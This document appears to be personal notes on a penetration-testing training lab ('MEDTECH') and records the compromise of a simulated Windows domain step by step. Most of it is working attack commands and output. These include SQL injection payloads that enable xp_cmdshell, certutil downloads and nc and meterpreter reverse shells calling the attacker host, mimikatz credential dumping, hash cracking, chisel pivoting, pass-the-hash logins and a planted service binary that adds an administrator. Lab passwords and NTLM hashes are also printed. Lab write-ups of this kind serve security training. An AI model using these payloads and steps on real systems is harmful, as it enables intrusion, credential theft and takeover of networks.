Challege Lab1-MEDTECH - Githubissues

Lab1

172.16.221.10
172.16.221.11
192.168.221.120
192.168.221.121
192.168.221.122
172.16.221.12
172.16.221.13
172.16.221.14
172.16.221.82
172.16.221.83

192.168.45.203/215 - Kali

Because Kali is in 192.168.x.x subnetwork,so let:s enum the following hosts at first.

nmap -sV -T5 192.168.221.120-122
...
...
Nmap scan report for 192.168.221.120
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
...
...
Nmap scan report for 192.168.221.121
Host is up (0.19s latency).
Not shown: 992 closed tcp ports (conn-refused)
PORT     STATE    SERVICE       VERSION
80/tcp   open     http          Microsoft IIS httpd 10.0
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open     microsoft-ds?
2013/tcp filtered raid-am
6566/tcp filtered sane-port
8994/tcp filtered unknown
9200/tcp filtered wap-wsp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
...
...
Nmap scan report for 192.168.221.122
Host is up (0.19s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
1093/tcp  filtered proofd
1094/tcp  filtered rootd
2049/tcp  filtered nfs
5679/tcp  filtered activesync
6779/tcp  filtered unknown
7920/tcp  filtered unknown
9877/tcp  filtered x510
40911/tcp filtered unknown
49999/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

For 192.168.221.120

searchsploit for ruby v2.7/WEBrick/ssh v8.4/jekyll
--> No info
Access 80 port via web broswser

gobuster dir -u http://192.168.221.120 -w /usr/share/wordlists/dirb/common.txt -x txt,pdf,config


/404                  (Status: 200) [Size: 4328]
/about                (Status: 301) [Size: 44] [--> http://192.168.221.120/about/]
/assets               (Status: 301) [Size: 46] [--> http://192.168.221.120/assets/]
/index                (Status: 200) [Size: 4649]
/index.html           (Status: 200) [Size: 4649]
/robots.txt           (Status: 200) [Size: 36]
/robots.txt           (Status: 200) [Size: 36]
/sitemap.xml          (Status: 200) [Size: 503]
/static               (Status: 301) [Size: 46] [--> http://192.168.221.120/static/]


- gobuster dir -u http://192.168.221.120/jekyll -w /usr/share/wordlists/dirb/common.txt  -x txt,pdf,config
---> No info

----------->
SSH Login:
ssh offsec@192.168.214.120 (pwd: century62hisan51)

sudo su
--> succeed to become root user!

find / -name proof.txt 2>/dev/null ---> succeed.

for 192.168.221.121

Access 80 port via web broswser

http://192.168.221.121/login.aspx --> SQL injection and SQL server is MSSQL ' order by 1,2,3,4,5,6 --// ====> column is 2

' UNION SELECT null,null--//
' UNION SELECT null,CURRENT_USER--//

--> No sql error ---> blind injection? ' IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFOR DELAY '0:0:0';-- --> it works!

[On Kali] Prepare a nc64.exe file (https://github.com/int0x33/nc.exe/blob/master/nc64.exe) and run python3 -m http.server 80

';EXEC sp_configure 'show advanced options', 1 -- //
%27%3BEXEC%20sp_configure%20%27show%20advanced%20options%27%2C%201%20--%20%2F%2F

';RECONFIGURE -- //
%27%3BRECONFIGURE%20--%20%2F%2F

';EXECUTE sp_configure 'xp_cmdshell', 1;--//
%27%3BEXECUTE%20sp_configure%20%27xp_cmdshell%27%2C%201%3B--%2F%2F

';RECONFIGURE -- //
%27%3BRECONFIGURE%20--%20%2F%2F

then,

';EXECUTE xp_cmdshell "certutil -urlcache -f http://192.168.45.152/nc64.exe c:/windows/temp/nc64.exe";--"

%27%3BEXECUTE%20xp_cmdshell%20%22certutil%20-urlcache%20-f%20http%3A%2F%2F192.168.45.152%2Fnc64.exe%20c%3A%2Fwindows%2Ftemp%2Fnc64.exe%22%3B--

then,

';EXECUTE xp_cmdshell "c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.152 4444";--

%27%3BEXECUTE%20xp_cmdshell%20%22c%3A%2Fwindows%2Ftemp%2Fnc64.exe%20-e%20cmd.exe%20192.168.45.152%204444%22%3B--

==> nc listener get reverse shell from the target:

On the victim:

powershell PS C:\TEMP> whoami /priv
Privilege Name Description State
============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

iwr -uri http://192.168.45.152/PrintSpoofer64.exe -Outfile PrintSpoofer64.exe .\PrintSpoofer64.exe -i -c powershell.exe ---> Try again...Succeed!

then, try use mimikazt certutil -urlcache -f http://192.168.45.152/mimikatz.exe c:/temp/mimikatz.exe (Note: I used iwr at first but failed..)

powershell -ep bypass
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
-->
         * Username : joe
         * Domain   : MEDTECH
         * NTLM     : 08d7a47a6f9f66b97b1bae4178747494
         * Domain   : MEDTECH.COM
         * Password : Flowers1

next,

mimikatz # token::elevate ## to elevate to SYSTEM user privileges.
mimikatz # lsadump::sam
--> 
  Domain : WEB02
  User : Administrator
  Hash NTLM: b2c03054c306ac8fc5f9d188710b0168

User : offsec
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e

Try to crack offsec's hash:

echo "2892d26cdf84d7a70e2eb3b9f05c425e" >  offsec.hash
hashcat -m 1000 offsec.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

--> offsec's password is 'lab'

--> try to establish a ssh tunnel on this host. [Victim] ssh -V: ---> OpenSSH_for_Windows_8.1p1, LibreSSL 3.0.2 ssh -N -D 9999 kali@192.168.45.211 -vvv --->

debug3: Failed to open file:C:/Windows/system32/config/systemprofile/.ssh/known_hosts error:2
debug3: Failed to open file:C:/Windows/system32/config/systemprofile/.ssh/known_hosts2 error:2
debug3: Failed to open file:C:/ProgramData/ssh/ssh_known_hosts error:2
debug3: Failed to open file:C:/ProgramData/ssh/ssh_known_hosts2 error:2
debug3: failed to open file:C:/dev/tty error:3
debug1: read_passphrase: can't open /dev/tty: No such file or directory

... ---> didn't find solution...

Try using chisel: [Kali] 下载chisel到目前目录（https://github.com/jpillora/chisel/releases/tag/v1.9.1，下载windows amd64那个和 linux的）对于linux版本的chisel

kali@kali:~/beyond$ chmod a+x chisel
kali@kali:~/beyond$./chisel server -p 8000 --reverse

[Victim]

iwr -uri http://192.168.45.152/chisel.exe -Outfile chisel.exe
.\chisel client 192.168.45.152:8000 R:1080:socks

ok! HTTP channel is established via Chisel!

[Kali] edit '/etc/proxychains4.conf ' ==> socks5 127.0.0.1 1080 (1080 port is same as the port number in the pic above)

proxychains -q crackmapexec smb 172.16.206.10-14 172.16.206.82-83 -u joe -d MEDTECH.COM -p "Flowers1" --shares

SMB         172.16.206.10   445    DC01             [*] Windows 10.0 Build 20348 x64 (name:DC01) (domain:MEDTECH.COM) (signing:True) (SMBv1:False)
SMB         172.16.206.83   445    CLIENT02         [*] Windows 10.0 Build 22000 x64 (name:CLIENT02) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB         172.16.206.13   445    PROD01           [*] Windows 10.0 Build 20348 x64 (name:PROD01) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB         172.16.206.12   445    DEV04            [*] Windows 10.0 Build 20348 x64 (name:DEV04) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB         172.16.206.11   445    FILES02          [*] Windows 10.0 Build 20348 x64 (name:FILES02) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB         172.16.206.82   445    CLIENT01         [*] Windows 10.0 Build 22000 x64 (name:CLIENT01) (domain:MEDTECH.COM) (signing:False) (SMBv1:False)
SMB         172.16.206.10   445    DC01             [+] MEDTECH.COM\joe:Flowers1 
SMB         172.16.206.83   445    CLIENT02         [+] MEDTECH.COM\joe:Flowers1 
SMB         172.16.206.13   445    PROD01           [+] MEDTECH.COM\joe:Flowers1 

SMB         172.16.206.13   445    PROD01           [+] Enumerated shares
SMB         172.16.206.13   445    PROD01           Share           Permissions     Remark
SMB         172.16.206.13   445    PROD01           -----           -----------     ------
SMB         172.16.206.13   445    PROD01           ADMIN$                          Remote Admin
SMB         172.16.206.13   445    PROD01           C$                              Default share
SMB         172.16.206.13   445    PROD01           IPC$            READ            Remote IPC
SMB         172.16.206.83   445    CLIENT02         [+] Enumerated shares
SMB         172.16.206.83   445    CLIENT02         Share           Permissions     Remark
SMB         172.16.206.83   445    CLIENT02         -----           -----------     ------
SMB         172.16.206.83   445    CLIENT02         ADMIN$                          Remote Admin
SMB         172.16.206.83   445    CLIENT02         C               READ            
SMB         172.16.206.83   445    CLIENT02         C$                              Default share
SMB         172.16.206.83   445    CLIENT02         IPC$            READ            Remote IPC
SMB         172.16.206.83   445    CLIENT02         Windows         READ            
SMB         172.16.206.12   445    DEV04            [+] MEDTECH.COM\joe:Flowers1 
SMB         172.16.206.10   445    DC01             [+] Enumerated shares
SMB         172.16.206.10   445    DC01             Share           Permissions     Remark
SMB         172.16.206.10   445    DC01             -----           -----------     ------
SMB         172.16.206.10   445    DC01             ADMIN$          READ            Remote Admin
SMB         172.16.206.10   445    DC01             C$              READ,WRITE      Default share
SMB         172.16.206.10   445    DC01             IPC$            READ            Remote IPC
SMB         172.16.206.10   445    DC01             NETLOGON        READ            Logon server share 
SMB         172.16.206.10   445    DC01             SYSVOL          READ            Logon server share 
SMB         172.16.206.12   445    DEV04            [+] Enumerated shares
SMB         172.16.206.12   445    DEV04            Share           Permissions     Remark
SMB         172.16.206.12   445    DEV04            -----           -----------     ------
SMB         172.16.206.12   445    DEV04            ADMIN$                          Remote Admin
SMB         172.16.206.12   445    DEV04            C$                              Default share
SMB         172.16.206.12   445    DEV04            IPC$            READ            Remote IPC
SMB         172.16.206.11   445    FILES02          [+] MEDTECH.COM\joe:Flowers1 (Pwn3d!)
SMB         172.16.206.82   445    CLIENT01         [+] MEDTECH.COM\joe:Flowers1 
SMB         172.16.206.82   445    CLIENT01         [+] Enumerated shares
SMB         172.16.206.82   445    CLIENT01         Share           Permissions     Remark
SMB         172.16.206.82   445    CLIENT01         -----           -----------     ------
SMB         172.16.206.82   445    CLIENT01         ADMIN$                          Remote Admin
SMB         172.16.206.82   445    CLIENT01         C$                              Default share
SMB         172.16.206.82   445    CLIENT01         IPC$            READ            Remote IPC
SMB         172.16.206.11   445    FILES02          [+] Enumerated shares
SMB         172.16.206.11   445    FILES02          Share           Permissions     Remark
SMB         172.16.206.11   445    FILES02          -----           -----------     ------
SMB         172.16.206.11   445    FILES02          ADMIN$          READ,WRITE      Remote Admin
SMB         172.16.206.11   445    FILES02          C               READ,WRITE      
SMB         172.16.206.11   445    FILES02          C$              READ,WRITE      Default share
SMB         172.16.206.11   445    FILES02          IPC$            READ            Remote IPC
SMB         172.16.206.11   445    FILES02          TEMP            READ,WRITE

SMB 172.16.206.10 445 DC01 [+] MEDTECH.COM\joe:Flowers1 SMB 172.16.206.83 445 CLIENT02 [+] MEDTECH.COM\joe:Flowers1 SMB 172.16.206.13 445 PROD01 [+] MEDTECH.COM\joe:Flowers1 SMB 172.16.206.11 445 FILES02 [+] MEDTECH.COM\joe:Flowers1 (Pwn3d!) SMB 172.16.206.82 445 CLIENT01 [+] MEDTECH.COM\joe:Flowers1

-- sudo proxychains -q xfreerdp /d:'MEDTECH.COM' /u:'joe' /p:'Flowers1' /f +fonts +clipboard /v:172.16.206.82 ---> [06:41:19:211] [230042:230044] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] [06:41:19:211] [230042:230044] [ERROR][com.freerdp.core] - freerdp_post_connect failed

proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 -----> ^^^^^^^^^^^^^^^^^^^^^^ Succeed!

sudo proxychains nmap -sT 172.16.206.10-14 -p 22 --> 172.16.206.14 has 22 port open. ---> Try 'sudo proxychains ssh joe@172.16.206.14' but failed: permission denied.

proxychains impacket-GetNPUsers -dc-ip 172.16.193.10  -request -outputfile hashes.asreproast medtech.com/joe
--> No entries found!

proxychains -q crackmapexec smb 172.16.193.10-14 172.16.193.82-83 -u offsec -d MEDTECH.COM -p "lab" --shares
-->
172.16.193.10   445    DC01             [+] MEDTECH.COM\offsec:lab 
172.16.193.11   445    FILES02          [+] MEDTECH.COM\offsec:lab 
172.16.193.12   445    DEV04            [+] MEDTECH.COM\offsec:lab 
172.16.193.13   445    PROD01          [+] MEDTECH.COM\offsec:lab 
172.16.193.83   445    CLIENT02         [+] MEDTECH.COM\offsec:lab 
172.16.193.82   445    CLIENT01         [+] MEDTECH.COM\offsec:lab

proxychains impacket-GetNPUsers -dc-ip 172.16.193.10  -request -outputfile hashes.asreproast medtech.com/offsec
--> No entries found!

proxychains -q nmap -sT 172.16.206.10-14

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-14 10:26 EDT
Nmap scan report for 172.16.206.10
Host is up (0.000025s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
593/tcp open  http-rpc-epmap

Nmap scan report for 172.16.206.11
Host is up (0.000024s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap scan report for 172.16.206.12
Host is up (0.000025s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.206.13
Host is up (0.000024s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap scan report for 172.16.206.14
Host is up (0.000024s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh

sudo proxychains nmap -sT 172.16.206.82-83 -o nmap_result2

Nmap scan report for 172.16.206.82
Host is up (0.23s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 172.16.206.83
Host is up (0.22s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Other:

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue --> No info

Get-ChildItem -Path C:\ -Include local.txt -File -Recurse -ErrorAction SilentlyContinue --> No info

net user /domain --> FAILED. because this host is not joning AD domain.

try ssh joe@192.168.211.120/122 --> failed..

cd C:\TEMP iwr -uri http://192.168.45.203/winPEASx64.exe -Outfile winPEAS.exe .\winPEAS.exe ----> no found any useful info C:\inetpub\wwwroot\assets\js\jquery.form.js: username', value: 'jresig' }, { name: 'password', value: 'secret' } ]

cd C:\TEMP wmic service get name,pathname | findstr /i /v "C:\Windows\" | findstr /i /v """ --> No useful info

iwr -uri http://192.168.45.203/SharpHound.ps1 -Outfile SharpHound.ps1 powershell -ep bypass Import-Module .\Sharphound.ps1 Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\ ---> 2024-03-12T07:24:01.7181243-07:00|ERROR|Unable to connect to LDAP, verify your credentials (yes, the current user is not domain user )

cd C:\inetpub\wwwroot web.config ... connectionString=" server=localhost\SQLEXPRESS; database=webapp; uid=sa; password=WhileChirpTuesday218; ...

$SqlConnection.ConnectionString = "Server =127.0.0.1\SQLEXPRESS; Database = webapp; User ID = sa; Password = WhileChirpTuesday218;"

select * from INFORMATION_SCHEMA.TABLES

select * from users --> no info, empty result..

172.16.206.11

proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11 --> login to the victim.

net user /domain

According to the following info

SMB         172.16.206.11   445    FILES02          Share           Permissions     Remark
SMB         172.16.206.11   445    FILES02          -----           -----------     ------
....
SMB         172.16.206.11   445    FILES02          TEMP            READ,WRITE

[Kali] upload mimikatz.exe file to Victim proxychains smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1

[Victim]

powershell -ep bypass mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords ---> No useful info...

Username : Administrator
Domain : FILES02
NTLM : f1014ac49bae005ee3ece5f47547d185
SHA1 : 5e95d6c43e70e142df33af3b50ab0baa6ca02bad ....

mimikatz # token::elevate ## to elevate to SYSTEM user privileges. mimikatz # lsadump::sam ---> User : WDAGUtilityAccount Hash NTLM: 0c6ce171c9cc3afb29ca0ccc335e49bb

Get-ChildItem -Path C:\Users -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue --> find local.txt, proof.txt

proxychains smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1 --> No info

net group /domain

PS C:\temp> net group /domain
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins

net group "Domain Admins" /domain -->
Administrator leon

net group Domain users /domain --> Administrator joe krbtgt
leon mario offsec
peach wario yoshi

net group "Domain Computers" /domain --> CLIENT01$ CLIENT02$ DEV04$
FILES02$ PROD01$ WEB02$

[Kali] proxychains smbclient //172.16.208.11/TEMP -c 'put PowerView.ps1' --user=MEDTECH.COM/joe%Flowers1 PS Import-Module .\PowerView.ps1 PS Get-NetUser | select cn,pwdlastset,lastlogon

cn pwdlastset lastlogon

Administrator 12/5/2022 11:04:32 AM 3/15/2024 7:21:46 PM Guest 12/31/1600 4:00:00 PM 12/31/1600 4:00:00 PM offsec 9/27/2022 10:33:23 AM 12/31/1600 4:00:00 PM krbtgt 9/27/2022 10:47:41 AM 12/31/1600 4:00:00 PM leon 11/17/2022 12:36:23 PM 3/15/2024 8:49:43 PM joe 11/11/2022 2:02:39 AM 2/28/2023 5:41:40 AM peach 9/28/2022 3:51:13 AM 12/31/1600 4:00:00 PM mario 9/28/2022 3:50:46 AM 12/31/1600 4:00:00 PM wario 11/15/2022 1:43:27 AM 11/15/2022 1:43:35 AM yoshi 11/15/2022 5:25:26 AM 10/6/2022 3:44:30 AM

-----------------> No more hints now....

... ... ...

Get-ChildItem -Path C:\ -Filter "log" -Recurse -ErrorAction SilentlyContinue --> found c:\users\joe\Documents\fileMonitorBackup.log

---> PS type c:\users\joe\Documents\fileMonitorBackup.log|select-string NTLM

   88934 Oct 04 11:21  Backup      daisy                        6872 Backup Completed. NTLM: 
abf36048c1cf88f5603381c5128feb8e 
   88605 Oct 04 11:21  Backup      toad                         6872 Backup Completed. NTLM: 
5be63a865b65349851c1f11a067a3068                                                                                    
   88137 Oct 04 11:21  Backup      wario                        6872 Backup Completed. NTLM: 
fdf36048c1cf88f5630381c5e38feb8e                                                                                       

   87139 Oct 04 11:21  Backup      goomba                       6872 Backup Completed. NTLM: 
8e9e1516818ce4e54247e71e71b5f436 6872 Backup Complet

Note: On kali, 'cat fileMonitorBackup.log|grep NTLM' doesn't work...

---> [On Kali] Try to crack wario\s hash

echo "fdf36048c1cf88f5630381c5e38feb8e">wario.hash                                                                                                                                                                                                                                                                                           
hashcat -m 1000 wario.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
-->
Mushroom!

PS: when trying to crack other' hash, all failed.

daisy:
toad:
goomba:

[On Kali] proxychains -q crackmapexec smb 172.16.208.10-14 172.16.208.82-83 -u wario -d MEDTECH.COM -p "Mushroom!" --shares --> no admin host

net localgroup net localgroup "Remote desktop users" --> medtech/yoshi

[On Kali] proxychains -q crackmapexec winrm 172.16.208.10-14 172.16.208.82-83 -u wario -d MEDTECH.COM -p "Mushroom!" ---> WINRM 172.16.208.83 5985 172.16.208.83 [+] MEDTECH.COM\wario:Mushroom! (Pwn3d!)

proxychains -q evil-winrm -i 172.16.208.83 -u \wario -p "Mushroom!" ---------> SUCCEED!

172.16.193.83

[Kali] proxychains -q evil-winrm -i 172.16.208.83 -u wario -p "Mushroom\!" (Don't need domain name)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint

Evil-WinRM PS C:\Users\wario\Documents> ls Evil-WinRM PS C:\Users\wario\Documents> whoami medtech\wario Evil-WinRM PS C:\Users\wario\Documents>

whoami /priv ---> No 'SeImpersonatePrivilege', so can't use PrintSpoofer64.exe

Evil-WinRM PS C:\users\wario> services ---> C:\DevelopmentExecutables\auditTracker.exe ===》 we can replace it to abuse it.

Evil-WinRM PS C:\Users\wario\Documents> icacls "C:\DevelopmentExecutables\auditTracker.exe" C:\DevelopmentExecutables\auditTracker.exe Everyone:(I)(F) BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Users:(I)(RX) NT AUTHORITY\Authenticated Users:(I)(M) ----> We have Read and Execute (RX) rithts.

[On Kali] Prepare a file called addwario.c

#include <stdlib.h>

int main ()
{
  int i;
  i = system ("net localgroup administrators wario /add");

  return 0;
}

cross-compile the code on our Kali machine with mingw-64. kali@kali:~$ x86_64-w64-mingw32-gcc addwario.c -o addwario.exe

[Victim] Evil-WinRM PS C:\users\wario\Documents> upload addwario.exe . Evil-WinRM PS C:\users\wario\Documents> move C:\DevelopmentExecutables\auditTracker.exe auditTracker_bk.exe Evil-WinRM PS C:\users\wario\Documents> move .\addwario.exe C:\DevelopmentExecutables\auditTracker.exe

Evil-WinRM PS C:\users\wario\Documents> shutdown /r /t 0 --》Access denied Evil-WinRM PS C:\users\wario\Documents>sc.exe stop/start auditTracker ---> Works! wario has been add to localamini group: "Get-LocalGroupMember administrators" ---> Need to reloin again via Evil-WinRM with wario to take effective.

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue ---> test.log but no useful info

net user /domain --> 83 is not in domain.

Try using mimikatz.exe Evil-WinRM PS C:\DevelopmentExecutables> upload mimikatz.exe .

------------> Suggested to use msfvenom to get direct reverse shell [Kali] msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe use metasploit multi/handler to receive reverse shell: sudo msfconsole -q [Victim] Evil-WinRM PS C:\DevelopmentExecutables> upload met.exe . Evil-WinRM PS C:\DevelopmentExecutables> .\met.exe --->metasploit listerner will get a reverse shell from the victim.

powershell -ep bypass mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords ----> No useful info

mimikatz # token::elevate ## to elevate to SYSTEM user privileges. mimikatz # lsadump::sam ----> No useful info

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue --> No useful info.

172.16.228.82 : Reuse password!

Try to REUSE known password! 走投无路的时候试试resuse password！ ---> found that yoshi uses the same password as wario!

As you are in the dark to such things during a pen test, but it is something you can try just in case. At least the likelihood of password reuse is higher than random bruteforce

proxychains -q crackmapexec smb 172.16.228.10-14 172.16.228.82-83 -u yoshi -d MEDTECH.COM -p "Mushroom!" --> SMB 172.16.228.82 445 CLIENT01 [+] MEDTECH.COM\yoshi:Mushroom! (Pwn3d!)

proxychains -q impacket-psexec -hashes 000000000000000000000000000000000:fdf36048c1cf88f5630381c5e38feb8e yoshi@172.16.228.82 --> login succeessfully!

dir c:\Users

09/29/2022  01:54 AM    <DIR>          .
09/29/2022  01:19 AM    <DIR>          Administrator
09/29/2022  01:56 AM    <DIR>          Administrator.MEDTECH
09/29/2022  12:08 AM    <DIR>          offsec
09/29/2022  01:35 AM    <DIR>          offsec.CLIENT01    
09/29/2022  12:05 AM    <DIR>          Public

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue -->
C:\Users\Administrator.MEDTECH\Searches\hole.txt PS C:\Users> cat C:\Users\Administrator.MEDTECH\Searches\hole.txt leon:rabbit!:) --> fake info?

172.16.228.12 : RDP login

Based on the result of nmap scan, 12 support RDP.

Note: crackmapexec and netexec doesn't work well for rdp protocol,

proxychains -q crackmapexec 172.16.228.12 -u users.txt -p passwords.txt --local-auth
proxychains -q crackmapexec rdp/smb 172.16.228.12 -u users.txt -p passwords.txt -d MEDTECH.COM --continue-on-success

proxychains -q NetExec rdp 172.16.214.12 -u users.txt -p passwords.txt  -d MEDTECH.COM

----> No correct info! :(

So we need to manual check if we can login via RDP by ussing current username/password. ---> proxychains -q xfreerdp /u:'yoshi' /p:'Mushroom!' /d:'MEDTECH.COM' /f +fonts +clipboard /v:172.16.214.12 /cert-ignore /drive:.,kali-share ---> RDP login succcessfully!

Found backup.exe file under 'C:\TEMP' folder.

Get-CimInstance -ClassName win32service | Select Name,State,PathName | Where-Object {$.State -like 'Running ---> No useful info.

$env:path ----> No suspicious info

C:\Users\yoshi\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt --> No info

[Kali] prepare a met.exe: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe and use metasploit multi/handler to receive reverse shell:sudo msfconsole -q

[VIctim] Use met.exe to replace backup.exe under C:\TEMP ----> After around 10-15min, msfconsole listerner got a reverse from victim with admin right !!! ---> But, WHY?????

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue ---> no useful info except proof.txt

powershell -ep bypass mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords ---->

Username : leon
Domain : MEDTECH
NTLM : 2e208ad146efda5bc44869025e06544a
Password : rabbit:)

mimikatz # token::elevate ## to elevate to SYSTEM user privileges. mimikatz # lsadump::sam ----> No useful info

proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.214.10 ----> Login to DC01 successfully!

DC01 (172.16.x.10)

proxychains -q impacket-psexec -hashes :2e208ad146efda5bc44869025e06544a leon@172.16.188.10 ----> Login to DC01

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue ---> C:\Users\Administrator\Desktop\credentials.txt ---> web01: offsec/century62hisan51

Which one is 'web01'? Let's try it manually

---> [On Kali] ssh offsec@192.168.x.120/122 172.16.x.14 --> Can SSH login to 192.168.x.120 which is web01.

[On Kali] proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.214.10 MEDTECH.com/leon (PWD: rabbit:)) --> No info

proxychains -q crackmapexec smb 172.16.188.10-14 -u leon-d MEDTECH.COM -p "rabbit:)" --shares --->

SMB         172.16.188.10   445    DC01             [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB         172.16.188.12   445    DEV04            [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB         172.16.188.11   445    FILES02          [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)
SMB         172.16.188.13   445    PROD01           [+] MEDTECH.COM\leon:rabbit:) (Pwn3d!)

SMB         172.16.188.10   445    DC01             [+] Enumerated shares
SMB         172.16.188.10   445    DC01             Share           Permissions     Remark
SMB         172.16.188.10   445    DC01             -----           -----------     ------
SMB         172.16.188.10   445    DC01             ADMIN$          READ,WRITE      Remote Admin
SMB         172.16.188.10   445    DC01             C$              READ,WRITE      Default share
SMB         172.16.188.10   445    DC01             IPC$            READ            Remote IPC
SMB         172.16.188.10   445    DC01             NETLOGON        READ,WRITE      Logon server share 
SMB         172.16.188.10   445    DC01             SYSVOL          READ            Logon server share

---> Because the share folder 'NETLOGON' in DC01 has RW right, so we can upload mimikatz.exe from Kali to DC01: proxychains -q smbclient //172.16.188.10/NETLOGON -c 'put mimikatz.exe' --user='MEDTECH.COM/leon%rabbit:)'

[DC01] Get-ChildItem -Path C:\ mimikatz.exe -File -Recurse -ErrorAction SilentlyContinue ---> mimikatz.exe is located at C:\Windows\SYSVOL\domain\scripts cp C:\Windows\SYSVOL\domain\scripts\mimikatz.exe c:\users\leon\ ---> Then, powershell -ep bypass mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords ----》 Username : Administrator

Domain : MEDTECH
NTLM : c33b5cf9fa1b1bb4894d4a6cd7c54034
Password : denZV00Zwtpax57.

mimikatz # token::elevate ## to elevate to SYSTEM user privileges. mimikatz # lsadump::sam ----> User : Administrator Hash NTLM: 6bff4295a37d9c810ab95210a732f25a

no more useful info

